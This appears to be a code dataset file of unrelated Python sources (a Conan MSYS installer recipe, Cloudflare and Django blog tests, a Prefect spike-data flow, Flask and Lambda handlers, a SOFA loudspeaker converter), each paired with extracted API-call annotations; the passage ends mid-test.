'chess.const.Piece', 'Piece', (['PieceType.King', 'colour'], {}), '(PieceType.King, colour)\n', (14943, 14967), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((9175, 9188), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (9186, 9188), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((9242, 9255), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (9253, 9255), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((10720, 10767), 'chess.const.MoveFlags', 'MoveFlags', ([], {'LoseCastling': '{CastlingType.KingSide}'}), '(LoseCastling={CastlingType.KingSide})\n', (10729, 10767), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n')] |
from conans import ConanFile, tools
import os
class MsysBaseInstallerConan(ConanFile):
name = "msys-base_installer"
version = "2013072300"
license = "http://www.mingw.org/license"
url = "http://github.com/danimtb/conan-msys-installer"
settings = "os", "compiler"
build_policy = "missing"
description = "Msys"
build_requires = "7z_installer/1.0@conan/stable"
def configure(self):
if (self.settings.os != "Windows" and self.settings.compiler != "gcc"):
raise Exception("Not valid configuration: %s, %s. %s should be used in Windows, gcc" % (self.settings.os, self.settings.compiler, self.name))
def build(self):
files = {
"msys-bash": "http://prdownloads.sourceforge.net/mingw/bash-3.1.23-1-msys-1.0.18-bin.tar.xz",
"msys-bzip2": "http://prdownloads.sourceforge.net/mingw/bzip2-1.0.6-1-msys-1.0.17-bin.tar.lzma",
"msys-bzip2-dll": "http://prdownloads.sourceforge.net/mingw/libbz2-1.0.6-1-msys-1.0.17-dll-1.tar.lzma",
"msys-core": "http://prdownloads.sourceforge.net/mingw/msysCORE-1.0.19-1-msys-1.0.19-bin.tar.xz",
"msys-core-ext": "http://prdownloads.sourceforge.net/mingw/msysCORE-1.0.19-1-msys-1.0.19-ext.tar.xz",
"msys-core-lic": "http://prdownloads.sourceforge.net/mingw/msysCORE-1.0.19-1-msys-1.0.19-lic.tar.xz",
"msys-core-doc": "http://prdownloads.sourceforge.net/mingw/msysCORE-1.0.19-1-msys-1.0.19-doc.tar.xz",
"msys-coreutils": "http://prdownloads.sourceforge.net/mingw/coreutils-5.97-3-msys-1.0.13-bin.tar.lzma",
"msys-diffutils": "http://prdownloads.sourceforge.net/mingw/diffutils-2.8.7.20071206cvs-3-msys-1.0.13-bin.tar.lzma",
"msys-dos2unix": "http://prdownloads.sourceforge.net/mingw/dos2unix-7.3.2-1-msys-1.0.18-bin.tar.lzma",
"msys-file": "http://prdownloads.sourceforge.net/mingw/file-5.04-1-msys-1.0.13-bin.tar.lzma",
"msys-magic-dll": "http://prdownloads.sourceforge.net/mingw/libmagic-5.04-1-msys-1.0.13-dll-1.tar.lzma",
"msys-findutils": "http://prdownloads.sourceforge.net/mingw/findutils-4.4.2-2-msys-1.0.13-bin.tar.lzma",
"msys-gawk": "http://prdownloads.sourceforge.net/mingw/gawk-3.1.7-2-msys-1.0.13-bin.tar.lzma",
"msys-grep": "http://prdownloads.sourceforge.net/mingw/grep-2.5.4-2-msys-1.0.13-bin.tar.lzma",
"msys-gzip": "http://prdownloads.sourceforge.net/mingw/gzip-1.3.12-2-msys-1.0.13-bin.tar.lzma",
"msys-less": "http://prdownloads.sourceforge.net/mingw/less-436-2-msys-1.0.13-bin.tar.lzma",
"msys-libiconv": "http://prdownloads.sourceforge.net/mingw/libiconv-1.14-1-msys-1.0.17-dll-2.tar.lzma",
"msys-libintl": "http://prdownloads.sourceforge.net/mingw/libintl-0.18.1.1-1-msys-1.0.17-dll-8.tar.lzma",
"msys-make": "http://prdownloads.sourceforge.net/mingw/make-3.81-3-msys-1.0.13-bin.tar.lzma",
"msys-regex-dll": "http://prdownloads.sourceforge.net/mingw/libregex-1.20090805-2-msys-1.0.13-dll-1.tar.lzma",
"msys-sed": "http://prdownloads.sourceforge.net/mingw/sed-4.2.1-2-msys-1.0.13-bin.tar.lzma",
"msys-tar": "http://prdownloads.sourceforge.net/mingw/tar-1.23-1-msys-1.0.13-bin.tar.lzma",
"msys-termcap": "http://prdownloads.sourceforge.net/mingw/termcap-0.20050421_1-2-msys-1.0.13-bin.tar.lzma",
"msys-termcap-dll": "http://prdownloads.sourceforge.net/mingw/libtermcap-0.20050421_1-2-msys-1.0.13-dll-0.tar.lzma",
"msys-texinfo": "http://prdownloads.sourceforge.net/mingw/texinfo-4.13a-2-msys-1.0.13-bin.tar.lzma",
"msys-xz": "http://prdownloads.sourceforge.net/mingw/xz-5.0.3-1-msys-1.0.17-bin.tar.lzma",
"msys-lzma-dll": "http://prdownloads.sourceforge.net/mingw/liblzma-5.0.3-1-msys-1.0.17-dll-5.tar.lzma",
"msys-z-dll": "http://prdownloads.sourceforge.net/mingw/zlib-1.2.7-1-msys-1.0.17-dll.tar.lzma"
}
for util_name in files:
tools.download(files[util_name], util_name)
self.run("7z x %s" % util_name)
self.run("7z x %s~" % util_name)
os.unlink(util_name)
os.unlink("%s~" % util_name)
def package(self):
self.copy("*", dst="", src=".")
def package_info(self):
self.env_info.path.append(os.path.join(self.package_folder, "bin"))
| [
"os.path.join",
"conans.tools.download",
"os.unlink"
] | [((4018, 4061), 'conans.tools.download', 'tools.download', (['files[util_name]', 'util_name'], {}), '(files[util_name], util_name)\n', (4032, 4061), False, 'from conans import ConanFile, tools\n'), ((4163, 4183), 'os.unlink', 'os.unlink', (['util_name'], {}), '(util_name)\n', (4172, 4183), False, 'import os\n'), ((4196, 4224), 'os.unlink', 'os.unlink', (["('%s~' % util_name)"], {}), "('%s~' % util_name)\n", (4205, 4224), False, 'import os\n'), ((4356, 4396), 'os.path.join', 'os.path.join', (['self.package_folder', '"""bin"""'], {}), "(self.package_folder, 'bin')\n", (4368, 4396), False, 'import os\n')] |
"""Tests for 'cloudflare-gh-pages-dns' hook."""
import contextlib
import io
import os
import pytest
from hooks.cf_gh_pages_dns_records import check_cloudflare_gh_pages_dns_records
@pytest.mark.skipif(
not os.environ.get("CF_API_KEY"),
reason=(
"Cloudflare user API key defined in 'CF_API_KEY' environment variable"
" needed."
),
)
@pytest.mark.parametrize("quiet", (True, False), ids=("quiet=True", "quiet=False"))
@pytest.mark.parametrize(
("domain", "username", "expected_result", "expected_stderr"),
(
pytest.param(
"hrcgen.ml",
"mondeja",
True,
"",
id="domain=hrcgen.ml-username=mondeja", # configured with GH pages
),
pytest.param(
"foobar.baz",
"mondeja",
False,
(
"The domain 'foobar.baz' was not found being managed by your"
" Cloudflare account.\n"
),
id="domain=foobar.baz-username=mondeja", # inexistent zone
),
# TODO: add example domain to test bad configuration
),
)
def test_check_cloudflare_gh_pages_dns_records(
domain,
username,
expected_result,
expected_stderr,
quiet,
):
stderr = io.StringIO()
with contextlib.redirect_stderr(stderr):
result = check_cloudflare_gh_pages_dns_records(
domain,
username,
quiet=quiet,
)
assert result is expected_result
assert stderr.getvalue() == expected_stderr
| [
"os.environ.get",
"pytest.param",
"pytest.mark.parametrize",
"contextlib.redirect_stderr",
"io.StringIO",
"hooks.cf_gh_pages_dns_records.check_cloudflare_gh_pages_dns_records"
] | [((365, 451), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""quiet"""', '(True, False)'], {'ids': "('quiet=True', 'quiet=False')"}), "('quiet', (True, False), ids=('quiet=True',\n 'quiet=False'))\n", (388, 451), False, 'import pytest\n'), ((1275, 1288), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (1286, 1288), False, 'import io\n'), ((1299, 1333), 'contextlib.redirect_stderr', 'contextlib.redirect_stderr', (['stderr'], {}), '(stderr)\n', (1325, 1333), False, 'import contextlib\n'), ((1352, 1420), 'hooks.cf_gh_pages_dns_records.check_cloudflare_gh_pages_dns_records', 'check_cloudflare_gh_pages_dns_records', (['domain', 'username'], {'quiet': 'quiet'}), '(domain, username, quiet=quiet)\n', (1389, 1420), False, 'from hooks.cf_gh_pages_dns_records import check_cloudflare_gh_pages_dns_records\n'), ((214, 242), 'os.environ.get', 'os.environ.get', (['"""CF_API_KEY"""'], {}), "('CF_API_KEY')\n", (228, 242), False, 'import os\n'), ((554, 645), 'pytest.param', 'pytest.param', (['"""hrcgen.ml"""', '"""mondeja"""', '(True)', '""""""'], {'id': '"""domain=hrcgen.ml-username=mondeja"""'}), "('hrcgen.ml', 'mondeja', True, '', id=\n 'domain=hrcgen.ml-username=mondeja')\n", (566, 645), False, 'import pytest\n'), ((749, 931), 'pytest.param', 'pytest.param', (['"""foobar.baz"""', '"""mondeja"""', '(False)', '"""The domain \'foobar.baz\' was not found being managed by your Cloudflare account.\n"""'], {'id': '"""domain=foobar.baz-username=mondeja"""'}), '(\'foobar.baz\', \'mondeja\', False,\n """The domain \'foobar.baz\' was not found being managed by your Cloudflare account.\n"""\n , id=\'domain=foobar.baz-username=mondeja\')\n', (761, 931), False, 'import pytest\n')] |
import os
os.environ['PREFECT__LOGGING__LEVEL'] = 'DEBUG'
os.environ['DJANGO_ALLOW_ASYNC_UNSAFE'] = 'true'
from prefect import flow, task
import numpy as np
import pandas as pd
from django_pandas.io import read_frame
import helpers
@task
def insert_session(session_id):
from django_connect import connect
connect()
import db.models as d
session = helpers.get_session(session_id)
d.StimulusPresentation.objects.filter(session_id=session_id).delete()
# stimulus types
stim_types = read_frame(d.StimulusType.objects.all())
# stimulus presentations
stim_table = session.stimulus_presentations
stim_table = stim_table.replace({'null':None})
for k in ['phase','size','spatial_frequency']:
stim_table[k] = stim_table[k].apply(helpers.clean_string)
stim_table = stim_table.reset_index()
stim_table = stim_table.merge(stim_types.reset_index(), left_on='stimulus_name', right_on='name', how='left')
stim_table = stim_table.rename(columns={'id':'stimulus_type_id'}).drop(columns=['stimulus_name','name','index'])
stim_table['session_id'] = pd.Series([session.ecephys_session_id]*len(stim_table))
stim_table = stim_table.fillna(np.nan).replace({np.nan:None})
d.StimulusPresentation.objects.bulk_create([ d.StimulusPresentation(**v) for v in stim_table.to_dict(orient='records')])
@task
def list_units(session_id):
from django_connect import connect
connect()
import db.models as d
units = d.Unit.objects.filter(channel__session_probe__session_id=session_id)
return [ int(u.id) for u in units ]
@task
def insert_spike_times(session_id, unit_id):
from django_connect import connect
connect()
import db.models as d
print(f"insert_spike_times: session {session_id}, unit {unit_id}")
st = d.UnitSpikeTimes.objects.filter(unit_id=unit_id).delete()
session = helpers.get_session(session_id)
if unit_id in session.spike_times:
unit_spike_times = session.spike_times[unit_id]
st = d.UnitSpikeTimes(unit_id=unit_id, spike_times=list(unit_spike_times))
st.save()
@task
def insert_trial_spike_counts(unit_id):
from django_connect import connect
connect()
import db.models as d
d.TrialSpikeCounts.objects.filter(unit_id=unit_id).delete()
unit = d.Unit.objects.get(pk=unit_id)
session = unit.channel.session_probe.session
stim_table = d.StimulusPresentation.objects.filter(session=session)
stim_table = read_frame(stim_table)
unit_table = d.Unit.objects.filter(channel__session_probe__session=session)
duration = stim_table.stop_time-stim_table.start_time
spike_times = d.UnitSpikeTimes.objects.filter(unit=unit)
if len(spike_times) == 0:
return
spike_times = np.array(spike_times.first().spike_times)
count = helpers.spike_count(stim_table.start_time,stim_table.stop_time,spike_times)
this_df = pd.DataFrame(data = {
'unit_id':int(unit.id),
'stimulus_id':stim_table.id.values.astype(int),
'spike_count':count,
'spike_rate':np.divide(count,duration)
})
d.TrialSpikeCounts.objects.bulk_create([d.TrialSpikeCounts(**v) for v in this_df.to_dict(orient='records')])
@flow(name="spikes")
def spike_flow(session_id):
r0 = insert_session(session_id)
unit_ids = list_units(session_id, wait_for=[r0])
for unit_id in unit_ids.wait().result():
r1 = insert_spike_times(session_id=session_id, unit_id=unit_id)
insert_trial_spike_counts(unit_id=unit_id, wait_for=[r1])
if __name__ == "__main__":
spike_flow(session_id=732592105)
| [
"helpers.spike_count",
"db.models.TrialSpikeCounts",
"db.models.StimulusPresentation.objects.filter",
"prefect.flow",
"db.models.StimulusPresentation",
"db.models.UnitSpikeTimes.objects.filter",
"django_pandas.io.read_frame",
"django_connect.connect",
"helpers.get_session",
"db.models.Unit.objects... | [((3224, 3243), 'prefect.flow', 'flow', ([], {'name': '"""spikes"""'}), "(name='spikes')\n", (3228, 3243), False, 'from prefect import flow, task\n'), ((317, 326), 'django_connect.connect', 'connect', ([], {}), '()\n', (324, 326), False, 'from django_connect import connect\n'), ((368, 399), 'helpers.get_session', 'helpers.get_session', (['session_id'], {}), '(session_id)\n', (387, 399), False, 'import helpers\n'), ((1433, 1442), 'django_connect.connect', 'connect', ([], {}), '()\n', (1440, 1442), False, 'from django_connect import connect\n'), ((1482, 1550), 'db.models.Unit.objects.filter', 'd.Unit.objects.filter', ([], {'channel__session_probe__session_id': 'session_id'}), '(channel__session_probe__session_id=session_id)\n', (1503, 1550), True, 'import db.models as d\n'), ((1688, 1697), 'django_connect.connect', 'connect', ([], {}), '()\n', (1695, 1697), False, 'from django_connect import connect\n'), ((1878, 1909), 'helpers.get_session', 'helpers.get_session', (['session_id'], {}), '(session_id)\n', (1897, 1909), False, 'import helpers\n'), ((2198, 2207), 'django_connect.connect', 'connect', ([], {}), '()\n', (2205, 2207), False, 'from django_connect import connect\n'), ((2311, 2341), 'db.models.Unit.objects.get', 'd.Unit.objects.get', ([], {'pk': 'unit_id'}), '(pk=unit_id)\n', (2329, 2341), True, 'import db.models as d\n'), ((2408, 2462), 'db.models.StimulusPresentation.objects.filter', 'd.StimulusPresentation.objects.filter', ([], {'session': 'session'}), '(session=session)\n', (2445, 2462), True, 'import db.models as d\n'), ((2480, 2502), 'django_pandas.io.read_frame', 'read_frame', (['stim_table'], {}), '(stim_table)\n', (2490, 2502), False, 'from django_pandas.io import read_frame\n'), ((2521, 2583), 'db.models.Unit.objects.filter', 'd.Unit.objects.filter', ([], {'channel__session_probe__session': 'session'}), '(channel__session_probe__session=session)\n', (2542, 2583), True, 'import db.models as d\n'), ((2662, 2704), 'db.models.UnitSpikeTimes.objects.filter', 'd.UnitSpikeTimes.objects.filter', ([], {'unit': 'unit'}), '(unit=unit)\n', (2693, 2704), True, 'import db.models as d\n'), ((2825, 2902), 'helpers.spike_count', 'helpers.spike_count', (['stim_table.start_time', 'stim_table.stop_time', 'spike_times'], {}), '(stim_table.start_time, stim_table.stop_time, spike_times)\n', (2844, 2902), False, 'import helpers\n'), ((525, 553), 'db.models.StimulusType.objects.all', 'd.StimulusType.objects.all', ([], {}), '()\n', (551, 553), True, 'import db.models as d\n'), ((405, 465), 'db.models.StimulusPresentation.objects.filter', 'd.StimulusPresentation.objects.filter', ([], {'session_id': 'session_id'}), '(session_id=session_id)\n', (442, 465), True, 'import db.models as d\n'), ((1279, 1306), 'db.models.StimulusPresentation', 'd.StimulusPresentation', ([], {}), '(**v)\n', (1301, 1306), True, 'import db.models as d\n'), ((1805, 1853), 'db.models.UnitSpikeTimes.objects.filter', 'd.UnitSpikeTimes.objects.filter', ([], {'unit_id': 'unit_id'}), '(unit_id=unit_id)\n', (1836, 1853), True, 'import db.models as d\n'), ((2239, 2289), 'db.models.TrialSpikeCounts.objects.filter', 'd.TrialSpikeCounts.objects.filter', ([], {'unit_id': 'unit_id'}), '(unit_id=unit_id)\n', (2272, 2289), True, 'import db.models as d\n'), ((3153, 3176), 'db.models.TrialSpikeCounts', 'd.TrialSpikeCounts', ([], {}), '(**v)\n', (3171, 3176), True, 'import db.models as d\n'), ((3075, 3101), 'numpy.divide', 'np.divide', (['count', 'duration'], {}), '(count, duration)\n', (3084, 3101), True, 'import numpy as np\n')] |
from sqlalchemy import Column, ForeignKey, Integer, DateTime
from sqlalchemy.orm import relationship
from ..database import Base
class Artist_album(Base):
__tablename__ = "artists_albums"
id = Column(Integer, primary_key=True, index=True)
artist_id = Column(Integer, ForeignKey("artists.id"))
album_id = Column(Integer, ForeignKey("albums.id"))
created_at = Column(DateTime, nullable=False)
updated_at = Column(DateTime)
artist = relationship("Artist", back_populates="artists_albums")
album = relationship("Album", back_populates="artists_albums") | [
"sqlalchemy.orm.relationship",
"sqlalchemy.ForeignKey",
"sqlalchemy.Column"
] | [((204, 249), 'sqlalchemy.Column', 'Column', (['Integer'], {'primary_key': '(True)', 'index': '(True)'}), '(Integer, primary_key=True, index=True)\n', (210, 249), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n'), ((381, 413), 'sqlalchemy.Column', 'Column', (['DateTime'], {'nullable': '(False)'}), '(DateTime, nullable=False)\n', (387, 413), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n'), ((431, 447), 'sqlalchemy.Column', 'Column', (['DateTime'], {}), '(DateTime)\n', (437, 447), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n'), ((462, 517), 'sqlalchemy.orm.relationship', 'relationship', (['"""Artist"""'], {'back_populates': '"""artists_albums"""'}), "('Artist', back_populates='artists_albums')\n", (474, 517), False, 'from sqlalchemy.orm import relationship\n'), ((530, 584), 'sqlalchemy.orm.relationship', 'relationship', (['"""Album"""'], {'back_populates': '"""artists_albums"""'}), "('Album', back_populates='artists_albums')\n", (542, 584), False, 'from sqlalchemy.orm import relationship\n'), ((282, 306), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""artists.id"""'], {}), "('artists.id')\n", (292, 306), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n'), ((339, 362), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""albums.id"""'], {}), "('albums.id')\n", (349, 362), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n')] |
from flask import request
from firebase_admin import auth
import requests
from join import firebase
import ast
import time
def get_join():
token = request.headers['authorization']
decoded_token = auth.verify_id_token(token)
email = decoded_token['firebase']['identities']['email'][0]
tags_response = requests.get('http://tags:7000/api/users/tags', headers={'authorization': token}, verify=False)
dict_tag = tags_response.content.decode("UTF-8")
resp_tag = ast.literal_eval(dict_tag)
if "error" in resp_tag.keys():
return resp_tag
tasks_response = requests.get('http://tasks:1000/api/users/tasks', headers={'authorization': token}, verify=False)
dict_tasks = tasks_response.content.decode("UTF-8")
resp_tasks = ast.literal_eval(dict_tasks)
resp = {
"msg":"succeess",
"data":[{
"email":email,
"tags":resp_tag["data"][0]["tags"][0],
"tasks":resp_tasks["data"][0]["tasks"][0]
}],
"status":"200"
}
return resp
| [
"ast.literal_eval",
"firebase_admin.auth.verify_id_token",
"requests.get"
] | [((207, 234), 'firebase_admin.auth.verify_id_token', 'auth.verify_id_token', (['token'], {}), '(token)\n', (227, 234), False, 'from firebase_admin import auth\n'), ((332, 431), 'requests.get', 'requests.get', (['"""http://tags:7000/api/users/tags"""'], {'headers': "{'authorization': token}", 'verify': '(False)'}), "('http://tags:7000/api/users/tags', headers={'authorization':\n token}, verify=False)\n", (344, 431), False, 'import requests\n'), ((501, 527), 'ast.literal_eval', 'ast.literal_eval', (['dict_tag'], {}), '(dict_tag)\n', (517, 527), False, 'import ast\n'), ((619, 720), 'requests.get', 'requests.get', (['"""http://tasks:1000/api/users/tasks"""'], {'headers': "{'authorization': token}", 'verify': '(False)'}), "('http://tasks:1000/api/users/tasks', headers={'authorization':\n token}, verify=False)\n", (631, 720), False, 'import requests\n'), ((803, 831), 'ast.literal_eval', 'ast.literal_eval', (['dict_tasks'], {}), '(dict_tasks)\n', (819, 831), False, 'import ast\n')] |
#!/usr/bin/env python3.8
# coding=utf-8
"""
Simple Lambda Handler
"""
from lbz.dev.server import MyDevServer
from lbz.dev.test import Client
from lbz.exceptions import LambdaFWException
from lbz.resource import Resource
from lbz.response import Response
from lbz.router import add_route
class HelloWorld(Resource):
@add_route("/", method="GET")
def list(self):
return Response({"message": "HelloWorld"})
def handle(event, context):
try:
exp = HelloWorld(event)
resp = exp()
return resp
except Exception: # pylint: disable=broad-except
return LambdaFWException().get_response(context.aws_request_id).to_dict()
class TestHelloWorld:
def setup_method(self) -> None:
# pylint: disable=attribute-defined-outside-init
self.client = Client(resource=HelloWorld)
def test_filter_queries_all_active_when_no_params(self) -> None:
data = self.client.get("/").to_dict()["body"]
assert data == '{"message":"HelloWorld"}'
if __name__ == "__main__":
server = MyDevServer(acls=HelloWorld, port=8001)
server.run()
| [
"lbz.exceptions.LambdaFWException",
"lbz.router.add_route",
"lbz.response.Response",
"lbz.dev.test.Client",
"lbz.dev.server.MyDevServer"
] | [((322, 350), 'lbz.router.add_route', 'add_route', (['"""/"""'], {'method': '"""GET"""'}), "('/', method='GET')\n", (331, 350), False, 'from lbz.router import add_route\n'), ((1053, 1092), 'lbz.dev.server.MyDevServer', 'MyDevServer', ([], {'acls': 'HelloWorld', 'port': '(8001)'}), '(acls=HelloWorld, port=8001)\n', (1064, 1092), False, 'from lbz.dev.server import MyDevServer\n'), ((386, 421), 'lbz.response.Response', 'Response', (["{'message': 'HelloWorld'}"], {}), "({'message': 'HelloWorld'})\n", (394, 421), False, 'from lbz.response import Response\n'), ((809, 836), 'lbz.dev.test.Client', 'Client', ([], {'resource': 'HelloWorld'}), '(resource=HelloWorld)\n', (815, 836), False, 'from lbz.dev.test import Client\n'), ((603, 622), 'lbz.exceptions.LambdaFWException', 'LambdaFWException', ([], {}), '()\n', (620, 622), False, 'from lbz.exceptions import LambdaFWException\n')] |
# -*- coding: utf-8 -*-
"""
Created on Thu May 3 08:04:22 2018
@author: af5u13
"""
import numpy as np
import os
from .geometry_functions import deg2rad, sph2cart
from loudspeakerconfig import createArrayConfigFile
def createArrayConfigFromSofa( sofaFile, xmlFile = None, lspLabels = None, twoDSetup = False, virtualLoudspeakers = [] ):
"""
Create a loudspeaker configuraton file from a SOFA file containing a number of emitters representing loudspeakers.
Parameters
==========
sofaFile: string
A file path to a SOFA file.
xmlFile: string, optional
Path of the XML output file to be written.
Optional argument, if not provided, the SOFA file path is used with the extension replaced by ".xml"
lspLabels: list of strings, optional
List of loudspeaker labels, must match the number of emitters in the SOFA files.
If not provided, numbered labels are automatically generated.
twoDSetup: bool, optional
Flag specifying whether the aray is to be considered plane (True) or 3D (False).
Optional value, dafault is False (3D).
virtualLoudspeakers: list, optional
A list of virtual loudspeakers to be added to the setup. Each entry must be a Python dict as decribed
in the function :py:meth:`loudspeakerconfig.createArrayConfigFile`.
"""
import h5py # Import in the function to avoid a global dependency.
if not os.path.exists( sofaFile ):
raise ValueError( "SOFA file does not exist.")
if xmlFile is None:
xmlFile = os.path.basename(sofaFile) + '.xml'
fh = h5py.File( sofaFile )
ep =fh.get('EmitterPosition')
emitterCoordSystem = ep.attrs['Type'] # This is a required attribute.
emitterCoordSystem = emitterCoordSystem.decode("utf-8") # make it a string.
if emitterCoordSystem == "spherical":
posSph = np.squeeze( np.asarray(ep) )
posSph[:,0] = deg2rad( posSph[:,0] )
posSph[:,1] = deg2rad( posSph[:,1] )
posCart = sph2cart( posSph[:,0], posSph[:,1], posSph[:,2] )
else:
posCart = np.squeeze( np.asarray(ep) )
if twoDSetup:
posCart = posCart[:,0:2]
createArrayConfigFile( xmlFile,
posCart.T,
loudspeakerLabels = lspLabels,
twoDconfig = twoDSetup,
sphericalPositions = True,
virtualLoudspeakers = virtualLoudspeakers )
fh.close()
| [
"os.path.exists",
"numpy.asarray",
"h5py.File",
"loudspeakerconfig.createArrayConfigFile",
"os.path.basename"
] | [((1586, 1605), 'h5py.File', 'h5py.File', (['sofaFile'], {}), '(sofaFile)\n', (1595, 1605), False, 'import h5py\n'), ((2157, 2324), 'loudspeakerconfig.createArrayConfigFile', 'createArrayConfigFile', (['xmlFile', 'posCart.T'], {'loudspeakerLabels': 'lspLabels', 'twoDconfig': 'twoDSetup', 'sphericalPositions': '(True)', 'virtualLoudspeakers': 'virtualLoudspeakers'}), '(xmlFile, posCart.T, loudspeakerLabels=lspLabels,\n twoDconfig=twoDSetup, sphericalPositions=True, virtualLoudspeakers=\n virtualLoudspeakers)\n', (2178, 2324), False, 'from loudspeakerconfig import createArrayConfigFile\n'), ((1414, 1438), 'os.path.exists', 'os.path.exists', (['sofaFile'], {}), '(sofaFile)\n', (1428, 1438), False, 'import os\n'), ((1540, 1566), 'os.path.basename', 'os.path.basename', (['sofaFile'], {}), '(sofaFile)\n', (1556, 1566), False, 'import os\n'), ((1869, 1883), 'numpy.asarray', 'np.asarray', (['ep'], {}), '(ep)\n', (1879, 1883), True, 'import numpy as np\n'), ((2084, 2098), 'numpy.asarray', 'np.asarray', (['ep'], {}), '(ep)\n', (2094, 2098), True, 'import numpy as np\n')] |
# from unittest import skip
from django.conf import settings
from django.contrib import auth
from django.urls import reverse
from django.test import TestCase
from plok.models import Blog, Article
from .ext_test_case import ExtTestCase
class BlogList(TestCase):
url_name = 'plok:blog_list'
def test_reverse_blog_list(self):
self.assertEqual(reverse(self.url_name), '/list/')
def test_uses_correct_template(self):
response = self.client.get(reverse(self.url_name))
self.assertTemplateUsed(response, 'plok/blog_list.html')
def test_default_context(self):
creator = auth.get_user_model().objects.create(username='creator')
blog1 = Blog.objects.create(created_by=creator, name="test_blog_1", title="Test blog 1")
blog2 = Blog.objects.create(created_by=creator, name="test_blog_2", title="Test blog 2")
response = self.client.get(reverse(self.url_name))
self.assertEqual(response.context['page'], 'blogs')
self.assertEqual(response.context['title'], 'Blogs')
self.assertEqual(response.context['blog_list'].count(), 2)
self.assertEqual(response.context['blog_list'][0], blog1)
self.assertEqual(response.context['blog_list'][1], blog2)
self.assertEqual(response.context['message'], '')
# self.assertEqual(response.context['can_add'], True)
self.assertEqual(response.context['can_add'], False)
class BlogPage(ExtTestCase):
url_name = 'plok:blog'
def test_reverse_blog(self):
self.assertEqual(reverse(self.url_name, args=['test_blog']), '/plok/test_blog/')
def test_uses_correct_template(self):
creator = auth.get_user_model().objects.create(username='creator')
blog = Blog.objects.create(created_by=creator, name="test_blog")
response = self.client.get(reverse(self.url_name, args=[blog.name]))
self.assertTemplateUsed(response, 'plok/blog_detail.html')
def test_get_absolute_url(self):
creator = auth.get_user_model().objects.create(username='creator')
blog = Blog.objects.create(created_by=creator, name="test_blog")
self.assertEqual(blog.get_absolute_url(), reverse(self.url_name, args=[blog.name]))
def test_default_context(self):
creator = auth.get_user_model().objects.create(username='creator')
blog = Blog.objects.create(created_by=creator, name="test_blog", title="Test blog")
response = self.client.get(reverse(self.url_name, args=[blog.name]))
self.assertEqual(response.context['blog'], blog)
self.assertEqual(response.context['blog'].articles().count(), 0)
self.assertEqual(response.context['title'], 'Test blog')
self.assertEqual(response.context['message'], '')
self.assertEqual(response.context['can_edit'], False)
def test_404_no_blog(self):
response = self.client.get(reverse(self.url_name, args=['test_blog']))
self.assertTemplateUsed(response, '404.html')
def test_cant_edit_if_not_logged_in(self):
creator = auth.get_user_model().objects.create(username='creator')
blog = Blog.objects.create(created_by=creator, name="test_blog", title="Test blog")
response = self.client.get(reverse(self.url_name, args=[blog.name]))
self.assertEqual(response.context['can_edit'], False)
def test_cant_edit_if_not_creator(self):
creator = auth.get_user_model().objects.create(username='creator')
blog = Blog.objects.create(created_by=creator, name="test_blog", title="Test blog")
self.create_and_log_in_user()
response = self.client.get(reverse(self.url_name, args=[blog.name]))
self.assertEqual(response.context['can_edit'], False)
def test_shows_articles(self):
creator = auth.get_user_model().objects.create(username='creator')
blog = Blog.objects.create(created_by=creator, name="test_blog", title="Test blog")
article = Article.objects.create(blog=blog, name="test_article", title="Test article", created_by=creator)
response = self.client.get(reverse(self.url_name, args=[blog.name]))
self.assertEqual(response.context['blog'].articles().count(), 1)
self.assertEqual(response.context['blog'].articles()[0], article)
class CreateBlogPage(ExtTestCase):
url_name = 'plok:blog_create'
def test_reverse_blog_create(self):
self.assertEqual(reverse(self.url_name), '/create/')
def test_uses_correct_template(self):
self.create_and_log_in_user()
response = self.client.get(reverse(self.url_name))
self.assertTemplateUsed(response, 'plok/blog_form.html')
def test_default_context(self):
self.create_and_log_in_user()
self.client.cookies.load({settings.LANGUAGE_COOKIE_NAME: 'en-us'})
response = self.client.get(reverse(self.url_name))
self.assertEqual(response.context['title'], 'Create new blog')
self.assertEqual(response.context['message'], '')
def test_can_create_new_blog(self):
self.assertEqual(Blog.objects.all().count(), 0)
self.create_and_log_in_user()
response = self.client.post(reverse(self.url_name), {
'name': 'test_blog',
'title': 'Test blog',
'description': 'For testing'},
follow=True)
self.assertEqual(Blog.objects.all().count(), 1)
self.assertEqual(response.context['blog'].name, 'test_blog')
self.assertEqual(response.context['blog'].title, 'Test blog')
self.assertEqual(response.context['blog'].description, 'For testing')
def test_cant_create_blog_if_not_logged_in(self):
response = self.client.get(reverse(self.url_name), follow=True)
self.assertTemplateUsed(response, 'account/login.html')
def test_cant_create_blog_with_existing_name(self):
user = self.create_and_log_in_user()
Blog.objects.create(created_by=user, name="test_blog", title="Test blog")
self.assertEqual(Blog.objects.all().count(), 1)
self.client.cookies.load({settings.LANGUAGE_COOKIE_NAME: 'en-us'})
response = self.client.post(
reverse(self.url_name),
{
'name': 'test_blog',
'title': 'Test blog',
'description': 'For testing'
},
follow=True)
self.assertEqual(Blog.objects.all().count(), 1)
self.assertTemplateUsed(response, 'plok/blog_form.html')
self.assertContains(response, 'Blog with this Name already exists')
class UpdateBlogPage(ExtTestCase):
url_name = 'plok:blog_update'
def test_reverse_blog_update(self):
self.assertEqual(reverse(self.url_name, args=['test_blog']), '/plok/test_blog/update/')
def test_uses_correct_template(self):
user = self.create_and_log_in_user()
blog = Blog.objects.create(created_by=user, name="test_blog")
response = self.client.get(reverse(self.url_name, args=[blog.name]))
self.assertTemplateUsed(response, 'plok/blog_form.html')
def test_404_no_blog(self):
self.create_and_log_in_user()
